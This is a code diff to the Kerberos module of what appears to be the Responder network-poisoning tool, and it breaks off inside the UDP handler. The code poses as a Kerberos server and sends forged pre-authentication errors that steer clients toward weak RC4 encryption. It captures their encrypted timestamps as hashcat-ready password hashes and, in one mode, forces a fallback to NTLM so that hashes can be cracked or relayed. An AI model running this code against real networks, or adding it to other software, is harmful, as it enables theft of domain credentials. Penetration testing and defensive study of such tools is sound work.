-				DomainLen  = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
-				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
+# Kerberos encryption types
+ENCRYPTION_TYPES = {
+	b'\x01': 'des-cbc-crc',
+	b'\x03': 'des-cbc-md5',
+	b'\x11': 'aes128-cts-hmac-sha1-96',
+	b'\x12': 'aes256-cts-hmac-sha1-96',
+	b'\x13': 'rc4-hmac',
+	b'\x14': 'rc4-hmac-exp',
+	b'\x17': 'rc4-hmac',
+	b'\x18': 'rc4-hmac-exp',
+}
 
-		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[45:46])[0]
-			if HashLen == 53:
-				Hash       = Data[48:99]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[147:148])[0]
-				Name       = Data[148:148+NameLen]
-				DomainLen  = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
-				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-			elif HashLen == 54:
-				Hash       = Data[53:105]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[148:149])[0]
-				Name       = Data[149:149+NameLen]
-				DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-		else:
-			Hash       = Data[48:100]
-			SwitchHash = Hash[16:]+Hash[0:16]
-			NameLen    = struct.unpack('<b',Data[148:149])[0]
-			Name       = Data[149:149+NameLen]
-			DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-			return BuildHash
-	return False
+def parse_asn1_length(data, offset):
+	"""Parse ASN.1 length field (short or long form)"""
+	if offset >= len(data):
+		return 0, 0
+	
+	first_byte = data[offset]
+	
+	# Short form (length < 128)
+	if first_byte < 0x80:
+		return first_byte, 1
+	
+	# Long form
+	num_octets = first_byte & 0x7F
+	if num_octets == 0 or offset + 1 + num_octets > len(data):
+		return 0, 0
+	
+	length = 0
+	for i in range(num_octets):
+		length = (length << 8) | data[offset + 1 + i]
+	
+	return length, 1 + num_octets
 
-def ParseMSKerbv5UDP(Data):
-	MsgType = Data[17:18]
-	EncType = Data[39:40]
+def encode_asn1_length(length):
+	"""Encode length in ASN.1 format"""
+	if length < 128:
+		return struct.pack('B', length)
+	
+	# Long form
+	length_bytes = []
+	temp = length
+	while temp > 0:
+		length_bytes.insert(0, temp & 0xFF)
+		temp >>= 8
+	
+	num_octets = len(length_bytes)
+	result = struct.pack('B', 0x80 | num_octets)
+	for byte in length_bytes:
+		result += struct.pack('B', byte)
+	
+	return result
 
-	if MsgType == "\x0a" and EncType == "\x17":
-		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[41:42])[0]
-			if HashLen == 54:
-				Hash       = Data[44:96]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[144:145])[0]
-				Name       = Data[145:145+NameLen]
-				DomainLen  = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
-				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-			elif HashLen == 53:
-				Hash       = Data[44:95]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[143:144])[0]
-				Name       = Data[144:144+NameLen]
-				DomainLen  = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
-				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-		else:
-			Hash       = Data[49:101]
-			SwitchHash = Hash[16:]+Hash[0:16]
-			NameLen    = struct.unpack('<b',Data[149:150])[0]
-			Name       = Data[150:150+NameLen]
-			DomainLen  = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
-			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-			return BuildHash
-	return False
+def extract_principal_name(data):
+	"""Extract principal name from AS-REQ - searches in req-body only"""
+	try:
+		# Look for [4] req-body tag first to avoid PA-DATA
+		req_body_offset = None
+		for i in range(len(data) - 100):
+			if data[i:i+1] == b'\xa4':  # [4] req-body
+				req_body_offset = i
+				break
+		
+		if req_body_offset is None:
+			return "user"
+		
+		# Search for [1] cname AFTER req-body starts
+		search_start = req_body_offset
+		search_end = min(search_start + 150, len(data) - 20)
+		
+		for i in range(search_start, search_end):
+			# Look for GeneralString (0x1b) with reasonable length
+			if data[i:i+1] == b'\x1b':
+				name_len = data[i+1] if i+1 < len(data) else 0
+				if 1 < name_len < 30 and i + 2 + name_len <= len(data):
+					name = data[i+2:i+2+name_len].decode('latin-1', errors='ignore')
+					# Validate: printable, no control chars, looks like username
+					if (name and 
+						name.isprintable() and 
+						name.isascii() and
+						not any(c in name for c in ['\x00', '\n', '\r', '\t']) and
+						all(c.isalnum() or c in '.-_@' for c in name)):
+						return name
+		
+		return "user"
+	except:
+		return "user"
+
+def extract_realm(data):
+	"""Extract realm from AS-REQ - searches in req-body only"""
+	try:
+		# Look for [4] req-body tag first
+		req_body_offset = None
+		for i in range(len(data) - 100):
+			if data[i:i+1] == b'\xa4':  # [4] req-body
+				req_body_offset = i
+				break
+		
+		if req_body_offset is None:
+			return settings.Config.MachineName.upper()
+		
+		# Search for realm AFTER req-body starts
+		search_start = req_body_offset + 10
+		search_end = min(search_start + 150, len(data) - 20)
+		
+		for i in range(search_start, search_end):
+			# Look for GeneralString (0x1b) with reasonable length
+			if data[i:i+1] == b'\x1b':
+				realm_len = data[i+1] if i+1 < len(data) else 0
+				# Realm should be 5-50 chars (like "DOMAIN.LOCAL")
+				if 5 < realm_len < 50 and i + 2 + realm_len <= len(data):
+					realm = data[i+2:i+2+realm_len].decode('latin-1', errors='ignore')
+					# Validate: printable ASCII, contains dot, looks like domain
+					if (realm and 
+						realm.isprintable() and 
+						realm.isascii() and
+						'.' in realm and 
+						realm.count('.') >= 1 and realm.count('.') <= 5 and
+						not any(c in realm for c in ['\x00', '\n', '\r', '\t', '/', ':', ' ']) and
+						all(c.isalnum() or c in '.-' for c in realm)):
+						return realm
+		
+		return settings.Config.MachineName.upper()
+	except:
+		return settings.Config.MachineName.upper()
+
+def find_msg_type(data):
+	"""Find Kerberos message type by parsing ASN.1 structure"""
+	try:
+		offset = 0
+		
+		# Check APPLICATION tag
+		# [10] for AS-REQ (0x6a)
+		# [12] for TGS-REQ (0x6c)
+		if offset >= len(data):
+			return None, False, None, None
+		
+		app_tag = data[offset]
+		if app_tag not in [0x6a, 0x6c]:  # AS-REQ or TGS-REQ
+			return None, False, None, None
+		
+		offset += 1
+		
+		# Parse outer length
+		length, consumed = parse_asn1_length(data, offset)
+		if consumed == 0:
+			return None, False, None, None
+		offset += consumed
+		
+		# SEQUENCE tag
+		if offset >= len(data) or data[offset] != 0x30:
+			return None, False, None, None
+		offset += 1
+		
+		# Parse SEQUENCE length
+		seq_length, consumed = parse_asn1_length(data, offset)
+		if consumed == 0:
+			return None, False, None, None
+		offset += consumed
+		
+		# [1] pvno
+		if offset >= len(data) or data[offset] != 0xa1:
+			return None, False, None, None
+		offset += 1
+		
+		pvno_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed + pvno_len
+		
+		# [2] msg-type
+		if offset >= len(data) or data[offset] != 0xa2:
+			return None, False, None, None
+		offset += 1
+		
+		msgtype_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed
+		
+		# INTEGER tag
+		if offset >= len(data) or data[offset] != 0x02:
+			return None, False, None, None
+		offset += 1
+		
+		int_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed
+		
+		if offset >= len(data):
+			return None, False, None, None
+		
+		msg_type = data[offset]
+		
+		# Extract client name and realm for KRB-ERROR response
+		cname = extract_principal_name(data)
+		realm = extract_realm(data)
+		
+		return msg_type, True, cname, realm
+	
+	except:
+		return None, False, None, None
+
+def extract_encrypted_timestamp(data):
+	"""
+	Extract encrypted timestamp from PA-ENC-TIMESTAMP in AS-REQ
+	Returns: (etype, cipher_hex) or (None, None)
+	"""
+	try:
+		# Look for PA-ENC-TIMESTAMP pattern: a1 03 02 01 02 (padata-type = 2)
+		for i in range(len(data) - 60):
+			# Look for the specific pattern that indicates PA-ENC-TIMESTAMP
+			if (i + 5 < len(data) and 
+				data[i] == 0xa1 and data[i+1] == 0x03 and 
+				data[i+2] == 0x02 and data[i+3] == 0x01 and 
+				data[i+4] == 0x02):  # padata-type = 2
+				
+				# Now find [2] padata-value which should be right after
+				j = i + 5
+				if j < len(data) and data[j] == 0xa2:  # [2] padata-value
+					j += 1
+					# Parse length of padata-value
+					pv_len, consumed = parse_asn1_length(data, j)
+					j += consumed
+					
+					# Inside padata-value is OCTET STRING containing EncryptedData
+					if j < len(data) and data[j] == 0x04:  # OCTET STRING
+						j += 1
+						octet_len, consumed = parse_asn1_length(data, j)
+						j += consumed
+						
+						# Now we're inside EncryptedData SEQUENCE
+						if j < len(data) and data[j] == 0x30:  # SEQUENCE
+							j += 1
+							seq_len, consumed = parse_asn1_length(data, j)
+							j += consumed
+							
+							# Look for [0] etype
+							if j < len(data) and data[j] == 0xa0:  # [0] etype
+								j += 1
+								etype_len, consumed = parse_asn1_length(data, j)
+								j += consumed
+								
+								# INTEGER tag
+								if j < len(data) and data[j] == 0x02:
+									j += 1
+									int_len, consumed = parse_asn1_length(data, j)
+									j += consumed
+									etype = data[j] if j < len(data) else None
+									j += int_len
+									
+									# Now look for [2] cipher (OCTET STRING)
+									if j < len(data) and data[j] == 0xa2:  # [2] cipher
+										j += 1
+										cipher_tag_len, consumed = parse_asn1_length(data, j)
+										j += consumed
+										
+										# OCTET STRING
+										if j < len(data) and data[j] == 0x04:
+											j += 1
+											cipher_len, consumed = parse_asn1_length(data, j)
+											j += consumed
+											
+											if j + cipher_len <= len(data):
+												cipher = data[j:j+cipher_len]
+												cipher_hex = cipher.hex()
+												return etype, cipher_hex
+		
+		return None, None
+	except Exception as e:
+		if settings.Config.Verbose:
+			print(text('[KERB] Error extracting timestamp: %s' % str(e)))
+		return None, None
+
+def find_padata_and_etype(data):
+	"""
+	Search for PA-DATA and determine encryption type
+	Returns: (has_padata, etype) where etype is the encryption type number or None
+	"""
+	try:
+		# Look for [3] PA-DATA tag (0xa3)
+		for i in range(len(data) - 60):
+			if data[i:i+1] == b'\xa3':
+				# Found PA-DATA, now we need to check if it contains PA-ENC-TIMESTAMP
+				# Structure: [3] SEQUENCE OF { [1] padata-type, [2] padata-value }
+				
+				# Look for [1] padata-type within next 30 bytes
+				has_pa_enc_timestamp = False
+				padata_value_offset = None
+				
+				for j in range(i, min(i + 30, len(data) - 10)):
+					if data[j:j+1] == b'\xa1':  # [1] padata-type
+						# Check if padata-type = 2 (PA-ENC-TIMESTAMP)
+						# Pattern: a1 03 02 01 02
+						if j + 4 < len(data) and data[j+1:j+5] == b'\x03\x02\x01\x02':
+							has_pa_enc_timestamp = True
+							# Next should be [2] padata-value
+							break
+				
+				if not has_pa_enc_timestamp:
+					# PA-DATA exists but not PA-ENC-TIMESTAMP
+					# This is normal for first AS-REQ
+					return False, None
+				
+				# Now look for [2] padata-value which contains EncryptedData
+				for j in range(i, min(i + 50, len(data) - 10)):
+					if data[j:j+1] == b'\xa2':  # [2] padata-value
+						# Inside padata-value is EncryptedData
+						# Now look for [0] etype inside EncryptedData
+						for k in range(j, min(j + 30, len(data) - 5)):
+							if data[k:k+1] == b'\xa0':  # [0] etype
+								# Pattern: a0 03 02 01 <etype>
+								if k + 4 < len(data) and data[k+1:k+3] == b'\x03\x02':
+									etype = data[k+4]
+									if settings.Config.Verbose:
+										etype_name = ENCRYPTION_TYPES.get(bytes([etype]), 'unknown')
+										print(text('[KERB] Found PA-ENC-TIMESTAMP with etype %d (%s)' % (etype, etype_name)))
+									return True, etype
+				
+				# Found PA-DATA but couldn't determine etype
+				return True, None
+		
+		return False, None
+	
+	except:
+		return False, None
+
+def build_krb_error(realm, cname, sname=None):
+	"""
+	Build KRB-ERROR response with PA-DATA for pre-authentication
+	
+	KRB-ERROR ::= [APPLICATION 30] SEQUENCE {
+		pvno[0] INTEGER (5),
+		msg-type[1] INTEGER (30),
+		ctime[2] KerberosTime OPTIONAL,
+		cusec[3] INTEGER OPTIONAL,
+		stime[4] KerberosTime,
+		susec[5] INTEGER,
+		error-code[6] INTEGER,
+		crealm[7] Realm OPTIONAL,
+		cname[8] PrincipalName OPTIONAL,
+		realm[9] Realm,
+		sname[10] PrincipalName,
+		e-text[11] GeneralString OPTIONAL,
+		e-data[12] OCTET STRING OPTIONAL
+	}
+	"""
+	
+	# Get current time
+	current_time = time.time()
+	time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
+	susec = int((current_time - int(current_time)) * 1000000)
+	
+	# Build sname (server name) - krbtgt/REALM@REALM
+	if sname is None:
+		sname = 'krbtgt'
+	
+	# Build the inner SEQUENCE
+	inner = b''
+	
+	# [0] pvno: 5
+	inner += b'\xa0\x03\x02\x01\x05'
+	
+	# [1] msg-type: 30 (KRB-ERROR)
+	inner += b'\xa1\x03\x02\x01\x1e'
+	
+	# [4] stime (server time)
+	# KerberosTime is GeneralizedTime (tag 0x18)
+	time_bytes = time_str.encode('ascii')
+	inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
+	
+	# [5] susec (microseconds)
+	susec_bytes = struct.pack('>I', susec)
+	# Remove leading zeros
+	while len(susec_bytes) > 1 and susec_bytes[0] == 0:
+		susec_bytes = susec_bytes[1:]
+	inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
+	
+	# [6] error-code: 25 (KDC_ERR_PREAUTH_REQUIRED)
+	inner += b'\xa6\x03\x02\x01\x19'
+	
+	# [9] realm (server realm)
+	realm_bytes = realm.encode('ascii')
+	inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
+	
+	# [10] sname (server principal name)
+	# PrincipalName ::= SEQUENCE { name-type[0] Int32, name-string[1] SEQUENCE OF GeneralString }
+	sname_str = sname.encode('ascii')
+	realm_str = realm.encode('ascii')
+	
+	# Build name-string SEQUENCE
+	name_string_seq = b''
+	# First component: service name (krbtgt)
+	name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
+	# Second component: realm
+	name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
+	
+	# Wrap in SEQUENCE
+	name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
+	
+	# Build name-string [1]
+	name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
+	
+	# Build name-type [0] - type 2 (KRB_NT_SRV_INST)
+	name_type = b'\xa0\x03\x02\x01\x02'
+	
+	# Build PrincipalName SEQUENCE
+	principal_seq = name_type + name_string_tagged
+	principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
+	
+	# Tag [10]
+	inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
+	
+	# [12] e-data (PA-DATA)
+	edata = build_pa_data(realm, cname)
+	inner += b'\xac' + encode_asn1_length(len(edata) + 2) + b'\x04' + encode_asn1_length(len(edata)) + edata
+	
+	# Wrap in SEQUENCE
+	sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
+	
+	# Wrap in APPLICATION 30 tag
+	krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
+	
+	return krb_error
+
+def build_krb_error_force_ntlm(realm, cname, sname=None):
+	"""
+	Build KRB-ERROR with KDC_ERR_ETYPE_NOSUPP (14)
+	This forces the client to fall back to NTLM authentication
+	
+	Useful when you want NetNTLMv2 hashes instead of Kerberos AS-REP:
+	- NetNTLMv2 is often faster to crack
+	- Can be relayed to other services
+	"""
+	
+	# Get current time
+	current_time = time.time()
+	time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
+	susec = int((current_time - int(current_time)) * 1000000)
+	
+	# Build sname (server name)
+	if sname is None:
+		sname = 'krbtgt'
+	
+	# Build the inner SEQUENCE
+	inner = b''
+	
+	# [0] pvno: 5
+	inner += b'\xa0\x03\x02\x01\x05'
+	
+	# [1] msg-type: 30 (KRB-ERROR)
+	inner += b'\xa1\x03\x02\x01\x1e'
+	
+	# [4] stime (server time)
+	time_bytes = time_str.encode('ascii')
+	inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
+	
+	# [5] susec (microseconds)
+	susec_bytes = struct.pack('>I', susec)
+	while len(susec_bytes) > 1 and susec_bytes[0] == 0:
+		susec_bytes = susec_bytes[1:]
+	inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
+	
+	# [6] error-code: 14 (KDC_ERR_ETYPE_NOSUPP) - forces NTLM fallback
+	inner += b'\xa6\x03\x02\x01\x0e'
+	
+	# [9] realm (server realm)
+	realm_bytes = realm.encode('ascii')
+	inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
+	
+	# [10] sname (server principal name)
+	sname_str = sname.encode('ascii')
+	realm_str = realm.encode('ascii')
+	
+	# Build name-string SEQUENCE
+	name_string_seq = b''
+	name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
+	name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
+	
+	# Wrap in SEQUENCE
+	name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
+	name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
+	name_type = b'\xa0\x03\x02\x01\x02'
+	
+	# Build PrincipalName SEQUENCE
+	principal_seq = name_type + name_string_tagged
+	principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
+	
+	# Tag [10]
+	inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
+	
+	# [11] e-text (error description)
+	etext_str = "KDC has no support for encryption type"
+	etext_bytes = etext_str.encode('ascii')
+	inner += b'\xab' + encode_asn1_length(len(etext_bytes) + 2) + b'\x1b' + encode_asn1_length(len(etext_bytes)) + etext_bytes
+	
+	# Wrap in SEQUENCE
+	sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
+	
+	# Wrap in APPLICATION 30 tag
+	krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
+	
+	return krb_error
+
+def build_pa_data(realm, cname):
+	"""
+	Build PA-DATA sequence for pre-authentication
+	
+	PA-DATA ::= SEQUENCE {
+		padata-type[1] Int32,
+		padata-value[2] OCTET STRING
+	}
+	
+	Returns SEQUENCE OF PA-DATA with:
+	- PA-ETYPE-INFO2 (19) - with RC4 first, then AES256
+	- PA-ENC-TIMESTAMP (2) - empty
+	- PA-PK-AS-REQ (16) - empty
+	- PA-PK-AS-REP-19 (15) - empty
+	"""
+	
+	pa_data_list = b''
+	
+	# 1. PA-ETYPE-INFO2 (type 19)
+	pa_etype_info2 = build_pa_etype_info2(realm, cname)
+	pa_data_list += build_single_pa_data(19, pa_etype_info2)
+	
+	# 2. PA-ENC-TIMESTAMP (type 2) - empty padata-value
+	pa_data_list += build_single_pa_data(2, b'')
+	
+	# 3. PA-PK-AS-REQ (type 16) - empty padata-value
+	pa_data_list += build_single_pa_data(16, b'')
+	
+	# 4. PA-PK-AS-REP-19 (type 15) - empty padata-value
+	pa_data_list += build_single_pa_data(15, b'')
+	
+	# Wrap in SEQUENCE
+	return b'\x30' + encode_asn1_length(len(pa_data_list)) + pa_data_list
+
+def build_single_pa_data(padata_type, padata_value):
+	"""Build a single PA-DATA entry"""
+	inner = b''
+	
+	# [1] padata-type
+	type_bytes = struct.pack('>I', padata_type)
+	# Remove leading zeros
+	while len(type_bytes) > 1 and type_bytes[0] == 0:
+		type_bytes = type_bytes[1:]
+	inner += b'\xa1\x03\x02\x01' + bytes([padata_type])
+	
+	# [2] padata-value (OCTET STRING)
+	if len(padata_value) > 0:
+		inner += b'\xa2' + encode_asn1_length(len(padata_value) + 2) + b'\x04' + encode_asn1_length(len(padata_value)) + padata_value
+	else:
+		# Empty OCTET STRING
+		inner += b'\xa2\x02\x04\x00'
+	
+	# Wrap in SEQUENCE
+	return b'\x30' + encode_asn1_length(len(inner)) + inner
+
+def build_pa_etype_info2(realm, cname):
+	"""
+	Build PA-ETYPE-INFO2 structure
+	
+	ETYPE-INFO2 ::= SEQUENCE OF ETYPE-INFO2-ENTRY
+	ETYPE-INFO2-ENTRY ::= SEQUENCE {
+		etype[0] Int32,
+		salt[1] GeneralString OPTIONAL,
+		s2kparams[2] OCTET STRING OPTIONAL
+	}
+	
+	Returns entries for RC4 (etype 23) first, then AES256 (etype 18)
+	RC4 is preferred as it's much faster to crack
+	"""
+	
+	# Build salt for AES: REALM + username (e.g., "SMB3.LOCALlgandx")
+	hostname = settings.Config.MachineName.lower()
+	salt_aes = realm + cname.lower()
+	salt_aes_bytes = salt_aes.encode('ascii')
+	
+	entries = b''
+	
+	# Entry 1: RC4-HMAC (etype 23 = 0x17)
+	# RC4 doesn't use salt in ETYPE-INFO2, only etype
+	inner_rc4 = b''
+	inner_rc4 += b'\xa0\x03\x02\x01\x17'  # [0] etype: 23
+	# No salt field for RC4
+	entry_rc4 = b'\x30' + encode_asn1_length(len(inner_rc4)) + inner_rc4
+	entries += entry_rc4
+	
+	# Entry 2: AES256 (etype 18 = 0x12)
+	inner_aes = b''
+	inner_aes += b'\xa0\x03\x02\x01\x12'  # [0] etype: 18
+	inner_aes += b'\xa1' + encode_asn1_length(len(salt_aes_bytes) + 2) + b'\x1b' + encode_asn1_length(len(salt_aes_bytes)) + salt_aes_bytes
+	entry_aes = b'\x30' + encode_asn1_length(len(inner_aes)) + inner_aes
+	entries += entry_aes
+	
+	# Wrap in SEQUENCE (ETYPE-INFO2 - SEQUENCE OF entries)
+	etype_info2 = b'\x30' + encode_asn1_length(len(entries)) + entries
+	
+	return etype_info2
 
 class KerbTCP(BaseRequestHandler):
+	"""Kerberos TCP handler (port 88)"""
+	
 	def handle(self):
-		data = self.request.recv(1024)
-		KerbHash = ParseMSKerbv5TCP(data)
-
-		if KerbHash:
-			n, krb, v, name, domain, d, h = KerbHash.split('$')
-
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+		try:
+			# TCP Kerberos uses 4-byte length prefix (Record Mark)
+			length_data = self.request.recv(4)
+			if len(length_data) < 4:
+				return
+			
+			# Parse Record Mark (big-endian, high bit reserved)
+			msg_length = struct.unpack('>I', length_data)[0] & 0x7FFFFFFF
+			
+			# Receive the Kerberos message
+			data = b''
+			while len(data) < msg_length:
+				chunk = self.request.recv(msg_length - len(data))
+				if not chunk:
+					return
+				data += chunk
+			
+			# Parse Kerberos message
+			msg_type, valid, cname, realm = find_msg_type(data)
+			
+			if not valid:
+				if settings.Config.Verbose:
+					print(text('[KERB] Invalid Kerberos message'))
+				return
+			
+			if msg_type == 10:  # AS-REQ
+				# Check operation mode
+				kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
+				
+				# Check if client sent PA-DATA
+				has_padata, etype = find_padata_and_etype(data)
+				
+				if has_padata and etype:
+					# Client sent pre-auth data - extract the encrypted timestamp
+					etype_num, cipher_hex = extract_encrypted_timestamp(data)
+					
+					if etype_num and cipher_hex:
+						etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
+						
+						if settings.Config.Verbose:
+							print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
+						
+						# Build the hash in hashcat format
+						if etype_num == 0x17 or etype_num == 0x18:  # RC4 (23 = 0x17, 24 = 0x18)
+							# RC4 format: $krb5pa$23$user$realm$dummy$hash
+							# Flip: last 36 bytes + first 16 bytes (per Responder's ParseMSKerbv5TCP)
+							
+							if len(cipher_hex) >= 32:
+								first_16_bytes = cipher_hex[0:32]   # First 16 bytes
+								rest = cipher_hex[32:]               # Rest (36 bytes)
+								flipped_hash = rest + first_16_bytes
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
+							else:
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
+								
+						elif etype_num == 0x12:  # AES256 (18) - hashcat mode 19900
+							# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
+						elif etype_num == 0x11:  # AES128 (17) - hashcat mode 19800
+							# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
+						else:
+							hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'AS-REQ',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'hash': hash_value,
+							'fullhash': hash_value
+						})
+						
+						# Print the hash
+						if settings.Config.Verbose:
+							if etype_num == 0x17 or etype_num == 0x18:
+								print(text('[KERB] Use hashcat -m 7500 (etype 23): %s' % hash_value))
+							elif etype_num == 0x12:
+								print(text('[KERB] Use hashcat -m 19900 (etype 18): %s' % hash_value))
+							elif etype_num == 0x11:
+								print(text('[KERB] Use hashcat -m 19800 (etype 17): %s' % hash_value))
+							else:
+								print(text('[KERB] Kerberos hash (etype %d): %s' % (etype_num, hash_value)))
+					else:
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
+				else:
+					# First AS-REQ without pre-auth
+					if kerberos_mode == 'FORCE_NTLM':
+						# Force NTLM fallback mode
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR with ETYPE_NOSUPP
+						krb_error = build_krb_error_force_ntlm(realm, cname)
+						
+						# Send with Record Mark
+						response = struct.pack('>I', len(krb_error)) + krb_error
+						self.request.sendall(response)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'NTLM-Fallback-Forced',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
+						})
+					else:
+						# Default CAPTURE mode - send pre-auth required
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR response
+						krb_error = build_krb_error(realm, cname)
+						
+						# Send with Record Mark
+						response = struct.pack('>I', len(krb_error)) + krb_error
+						self.request.sendall(response)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
+			
+			elif msg_type == 12:  # TGS-REQ
+				if settings.Config.Verbose:
+					print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[KERB] Error: %s' % str(e)))
 
 class KerbUDP(BaseRequestHandler):
-
+	"""Kerberos UDP handler (port 88)"""
+	
 	def handle(self):
-		data, soc = self.request
-		KerbHash = ParseMSKerbv5UDP(data)
-
-		if KerbHash:
-			(n, krb, v, name, domain, d, h) = KerbHash.split('$')
-
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+		try:
+			data, socket_obj = self.request
+			
+			# Parse Kerberos message
+			msg_type, valid, cname, realm = find_msg_type(data)
+			
+			if not valid:
+				if settings.Config.Verbose:
+					print(text('[KERB] Invalid Kerberos message'))
+				return
+			
+			if msg_type == 10:  # AS-REQ
+				# Check operation mode
+				kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
+				
+				# Check if client sent PA-DATA
+				has_padata, etype = find_padata_and_etype(data)
+				
+				if has_padata and etype:
